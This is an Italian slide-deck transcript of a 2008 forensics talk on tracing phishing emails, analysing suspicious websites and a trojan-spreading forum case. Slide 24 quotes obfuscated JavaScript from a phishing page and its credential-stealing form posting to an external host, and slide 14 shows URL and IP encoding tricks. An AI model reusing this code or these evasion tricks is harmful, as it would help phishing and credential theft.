Internet Forensics

39
Gianni Amato http://www.cfitaly.net 1 INTERNET FORENSICS di Gianni Amato 18/06/2008 Convegno CFItaly – Libera Università degli Studi S. Pio V, Roma

description

Internet Forensics

Transcript of Internet Forensics

Page 1: Internet Forensics

Gianni Amato http://www.cfitaly.net 1

INTERNET FORENSICS

di Gianni Amato18/06/2008

Convegno CFItaly – Libera Università degli Studi S. Pio V, Roma

Page 2: Internet Forensics

http://www.cfitaly.net 2Gianni Amato

About me (in breve) Ricercatore indipendente Pentest & Vulnerability Assessment Consulente di sicurezza informatica Collaborazioni

Internet MagazineAssociazione Meter

Page 3: Internet Forensics

http://www.cfitaly.net 3Gianni Amato

Internet non ha confini!

Chi crede di rimanere anonimo finché non fornisce i propri dati personali si sbaglia di grosso.

Page 4: Internet Forensics

http://www.cfitaly.net 4Gianni Amato

Reati commessi su Internet

Reati commessi mediante Internet

Internet Forensics?

Page 5: Internet Forensics

http://www.cfitaly.net 5Gianni Amato

pedopornografia terrorismo phishing frodi ...altre tipologie di reato

 diffamazioni, violazione della sfera personale, spam, defacing, intrusioni, malware...

Quali reati?

Page 6: Internet Forensics

http://www.cfitaly.net 6Gianni Amato

Individuare e valutare le cause; Analizzare e comprendere le 

dinamiche; Documentare e fornire gli indizi;

Iter

Page 7: Internet Forensics

http://www.cfitaly.net 7Gianni Amato

Phishing: tutto parte da una (fake) email (?)

Social Engineering ..lo studio del comportamento individuale di 

una persona al fine di carpire informazioni.

Page 8: Internet Forensics

http://www.cfitaly.net 8Gianni Amato

Generati casualmente Acquistati Bot a caccia di chiocciole

Come recuperano gli indirizzi email?

Page 9: Internet Forensics

http://www.cfitaly.net 9Gianni Amato

Vero o falso?

Partiamo dagli headers Percorso (MTA) seguito dall'email per raggiungerci (Recived:) 

disposto in ordine inverso Data, ora, protocollo, indirizzo ip

?Oggetto:  Eseguiamo la manutenzione delle nostre misure di sicurezzaDa:  "Poste italiane" <[email protected]>Rispondi:  "Poste italiane" <[email protected]> Data:  29/05/2008 18:26A: [email protected]

Page 10: Internet Forensics

http://www.cfitaly.net 10Gianni Amato

Delivered­To: [email protected]

Received: by 10.142.162.2 with SMTP id k2cs28985wfe;

        Thu, 29 May 2008 09:26:09 ­0700 (PDT)

Received: by 10.86.54.3 with SMTP id c3mr4230fga.55.1212078368105;

        Thu, 29 May 2008 09:26:08 ­0700 (PDT)

Return­Path: <[email protected]>

Received: from smtp21.orange.fr (smtp21.orange.fr [80.12.242.48])

        by mx.google.com with ESMTP id l12si757120fgb.8.2008.05.29.09.26.04;

        Thu, 29 May 2008 09:26:08 ­0700 (PDT)

Received­SPF: neutral (google.com: 80.12.242.48 is neither permitted nor denied by best guess record for domain of [email protected]) client­ip=80.12.242.48;

Authentication­Results: mx.google.com; spf=neutral (google.com: 80.12.242.48 is neither permitted nor denied by best guess record for domain of [email protected][email protected]

Header

Page 11: Internet Forensics

http://www.cfitaly.net 11Gianni Amato

Received: from User (ks3825.kimsufi.com [213.186.40.121])

by mwinf2114.orange.fr (SMTP Server) with ESMTP id AB8AC1C0011C;

Thu, 29 May 2008 18:26:03 +0200 (CEST)

X­ME­UUID: [email protected]

From: "Poste italiane" <[email protected]>

Subject: Eseguiamo la manutenzione delle nostre misure di sicurezza

Date: Thu, 29 May 2008 18:26:03 +0200

MIME­Version: 1.0

Content­Type: text/html;

charset="Windows­1251"

Content­Transfer­Encoding: 7bit

X­Priority: 3

X­MSMail­Priority: Normal

X­Mailer: Microsoft Outlook Express 6.00.2600.0000

X­MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

Message­Id: <[email protected]>

Header

Page 12: Internet Forensics

http://www.cfitaly.net 12Gianni Amato

whois traceroute blacklist

http://mxtoolbox.com/blacklists.aspx

Interrogare i server, i motori di ricerca e le blacklists

Page 13: Internet Forensics

http://www.cfitaly.net 13Gianni Amato

Criminali furbi

Fake headers Proxy anonimi (HTTP Proxy, SOCKS, ecc.) Relay aperti (SMTP) Reti WiFi aperte o poco protette Botnet

Page 14: Internet Forensics

http://www.cfitaly.net 14Gianni Amato

Url encoding http://www.sitoweb.it/?url=sitotarget.it http://www.sitoweb.it/?url=%67%6F%6F%67%6C%...... IP : 22.22.22.22 Octal : 0026.0026.0026.0026 Hex : 0x16.0x16.0x16.0x16 Dotless: 370546198

Page 15: Internet Forensics

http://www.cfitaly.net 15Gianni Amato

Analisi di un sito web

Analisi preliminare Analisi del codice Indagini temporali Indagini avanzate

Page 16: Internet Forensics

http://www.cfitaly.net 16Gianni Amato

Analisi preliminare Navigare e catalogare il sito Individuare i collegamenti relativi

es. css e script esterni Il codice fa la differenza

Page 17: Internet Forensics

http://www.cfitaly.net 17Gianni Amato

Fake <iframe>

code injection

xssSfruttare le vulnerabilità dei siti web per iniettare codice arbitrario

Analisi preliminare

Page 18: Internet Forensics

http://www.cfitaly.net 18Gianni Amato

Fake

Analisi preliminare

Page 19: Internet Forensics

http://www.cfitaly.net 19Gianni Amato

Analisi del codice Scaricare il codice sorgente in locale

Browser (Firefox, Opera, Internet Explorer) Amaya Wget

wget ­m ­k http://www.sitoweb.it

n.b. fare attenzione ai limiti di banda

Page 20: Internet Forensics

http://www.cfitaly.net 20Gianni Amato

Analisi del codice Interpretare la struttura del codice

Codice lungo e poco ordinato Meccanica incomprensibile

soprattutto se il codice è offuscato Link, tag e formattazioni

Page 21: Internet Forensics

http://www.cfitaly.net 21Gianni Amato

Escape e Unescape; Base64; 1000 modi per inventarsi una funzione di 

codifica;

Analisi del codiceJavascript

Page 22: Internet Forensics

http://www.cfitaly.net 22Gianni Amato

Ok, ora è tutto chiaro !?

Analisi del codice

Page 23: Internet Forensics

http://www.cfitaly.net 23Gianni Amato

Analisi del codice

Commento <!­­hppage status­”protected”­­>

Esiste sempre un punto di partenza document.write(unescape(“%3C%53%43...

Page 24: Internet Forensics

http://www.cfitaly.net 24Gianni Amato

<SCRIPT LANGUAGE="JavaScript"><!­­hp_ok=true;function hp_d01(s){if(!hp_ok)return;var o="",ar=new Array(),os="",ic=0;for(i=0;i<s.length;i++){c=s.charCodeAt(i);if(c<128)c=c^2;os+=String.fromCharCode(c);if(os.length>80){ar[ic++]=os;os=""}}o=ar.join("")+os;document.write(o)}//­­></SCRIPT>

<form name="Form_Auth" action="http://www.biohasardz.com/memo/images/1.php" method="post">...........

script code

Credential Stealer

Analisi del codice

Page 25: Internet Forensics

http://www.cfitaly.net 25Gianni Amato

Analisi del codice Individuare (se presenti) i metadati

alcuni software utilizzati per lo sviluppo delle pagine web aggiungono informazioni al codice

Nome del programma utilizzato Il nome dell'autore autore Numero di revisioni Data e ora

Page 26: Internet Forensics

http://www.cfitaly.net 26Gianni Amato

<!DOCTYPE HTML PUBLIC "­//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD>

<META HTTP­EQUIV="CONTENT­TYPE" CONTENT="text/html; charset=utf­8"><TITLE></TITLE><META NAME="GENERATOR" CONTENT="OpenOffice.org 2.3  (Linux)"><META NAME="AUTHOR" CONTENT="guelfoweb"><META NAME="CREATED" CONTENT="20080614;18464300"><META NAME="CHANGEDBY" CONTENT="guelfoweb"><META NAME="CHANGED" CONTENT="20080614;18472200"><STYLE TYPE="text/css"><!­­

@page { size: 21cm 29.7cm; margin: 2cm }P { margin­bottom: 0.21cm }

­­></STYLE>

</HEAD><BODY LANG="it­IT" DIR="LTR"><P STYLE="margin­bottom: 0cm">questa &egrave; una pagina web</P></BODY></HTML>

Analisi del codice

Page 27: Internet Forensics

http://www.cfitaly.net 27Gianni Amato

Analisi del codice Indizi da non trascurare

Errori Commenti Istruzioni commentate

Possono fornire importanti informazioni!

Page 28: Internet Forensics

http://www.cfitaly.net 28Gianni Amato

Indagine temporale

The Wayback Machine archive.org

Google Cache

Evoluzione del sito e vecchi contenuti

Page 29: Internet Forensics

http://www.cfitaly.net 29Gianni Amato

Indagine avanzata Directory listings Hidden directories Hidden files Hidden subdomains

Page 30: Internet Forensics

http://www.cfitaly.net 30Gianni Amato

Indagine avanzata

Page 31: Internet Forensics

http://www.cfitaly.net 31Gianni Amato

Le direttive del file robots.txt invita gli spiders dei motori di ricerca a non 

leggere o non indicizzare determinate pagine web;

aiuta gli investigatori a individuare i contenuti che il webmaster ha scelto, per qual si voglia motivo, di tenere nascosti;

Indagine avanzata

Page 32: Internet Forensics

http://www.cfitaly.net 32Gianni Amato

Non utilizzare tools aggressivi che potrebbero compromettere il sistema e di conseguenza infangare le prove

Indagine avanzata

Page 33: Internet Forensics

http://www.cfitaly.net 33Gianni Amato

Case history

Dalla pedopornografia al virus passando per un forum.

Associazione Meter – Don Fortunato Di Noto

Page 34: Internet Forensics

http://www.cfitaly.net 34Gianni Amato

Case history

All'interno del forum del sito web (xxx), oggetto di indagine, sono state rilevate immagini a carattere pornografico e pedopornografico

Associazione Meter – Don Fortunato Di Noto

Page 35: Internet Forensics

http://www.cfitaly.net 35Gianni Amato

Case history

Dalle indagini è emerso che il forum era stato abbandonato da quasi 3 anni; era stato compromesso sfruttando una 

vulnerabilità nota della piattaforma di gestione; erano state inserite delle keywords per scalare 

posizione nei motori di ricerca;

Associazione Meter – Don Fortunato Di Noto

Page 36: Internet Forensics

http://www.cfitaly.net 36Gianni Amato

Case history

Dalle indagini è emerso che la presenza di immagini pornografiche e 

pedopornografiche era solo un pretesto per invitare l'utente a cliccarci sopra e scaricare un trojan che si spacciava per un codec;

il trojan implementava funzionalità di backdoor che consentiva ai criminali di creare un botnet;

Associazione Meter – Don Fortunato Di Noto

Page 37: Internet Forensics

http://www.cfitaly.net 37Gianni Amato

Case history

Dalle indagini è emerso che il trojan risiedeva su un server straniero; una volta infettata la macchina, il trojan 

comunicava con diversi siti su server stranieri; le date di registrazione dei siti coincidevano o 

differivano di qualche giorno;

Associazione Meter – Don Fortunato Di Noto

Page 38: Internet Forensics

http://www.cfitaly.net 38Gianni Amato

Case history

Tra il 2007 e 2008 sono stati individuati 15 casi analoghi

Principali vittime: Comuni Scuole Università

Associazione Meter – Don Fortunato Di Noto

Page 39: Internet Forensics

http://www.cfitaly.net 39Gianni Amato

CONTATTI

Gianni Amato http://www.gianniamato.it

E­Mail: [email protected]. +39­3202842382